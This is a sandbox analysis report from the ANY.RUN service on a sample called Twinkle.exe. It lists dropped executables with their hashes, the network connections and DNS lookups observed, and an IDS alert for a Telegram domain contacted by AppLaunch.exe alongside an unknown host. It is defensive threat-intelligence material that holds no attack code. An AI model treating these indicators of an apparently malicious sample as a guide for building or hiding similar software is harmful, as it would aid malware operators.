SHA256:5325B2D91E8D2FB07FC0C3AFE0FB669AD6AD95D17A76E175F4611197FACC1CF6
5236Twinkle.tmpC:\Users\admin\AppData\Local\Temp\is-8GOL6.tmp\_isetup\_setup64.tmpexecutable
MD5:E4211D6D009757C078A9FAC7FF4F03D4
SHA256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
5236Twinkle.tmpC:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\is-4UMEC.tmpexecutable
MD5:E2970A14944FD74286BD6930F852178B
SHA256:5325B2D91E8D2FB07FC0C3AFE0FB669AD6AD95D17A76E175F4611197FACC1CF6
5236Twinkle.tmpC:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\docs\is-I4BGE.tmptext
MD5:2529E845806D223AFB1FF7DCDEAB55D4
SHA256:181314065DF2F2FDAF920B1A8B5311DAA216A2D6489A06ADA5B49CC514D89417
5236Twinkle.tmpC:\Users\admin\AppData\Roaming\{DEEE7B38-1859-44E3-BD5E-C9B49C21D221}\docs\is-K68FQ.tmpexecutable
MD5:9AACD65DC0DD646E37210F551C0BBCF8
SHA256:657560246FEF45B29D315A530959D311A35461977B750C4AEEABC2EDC18616C4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
66
DNS requests
55
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
2.16.168.114:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
516
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
516
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
864
svchost.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
732
AppLaunch.exe
GET
200
23.209.213.129:80
http://x1.c.lencr.org/
unknown
whitelisted
732
AppLaunch.exe
GET
200
108.156.60.38:80
http://e5.c.lencr.org/36.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
2.16.168.114:80
crl.microsoft.com
Akamai International B.V.
RU
whitelisted
5496
MoUsoCoreWorker.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
7736
RUXIMICS.exe
51.104.136.2:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
864
svchost.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
4
System
192.168.100.255:138
whitelisted
6544
svchost.exe
20.190.159.64:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.78
whitelisted
crl.microsoft.com
  • 2.16.168.114
  • 2.16.168.124
whitelisted
www.microsoft.com
  • 2.23.246.101
whitelisted
login.live.com
  • 20.190.159.64
  • 40.126.31.67
  • 20.190.159.131
  • 20.190.159.23
  • 40.126.31.131
  • 20.190.159.75
  • 40.126.31.2
  • 20.190.159.71
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted
t.me
  • 149.154.167.99
whitelisted
51.e1.4t.com
  • 116.202.3.169
unknown

Threats

PID
Process
Class
Message
732
AppLaunch.exe
Misc activity
ET INFO Observed Telegram Domain (t .me in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Twinkle.exe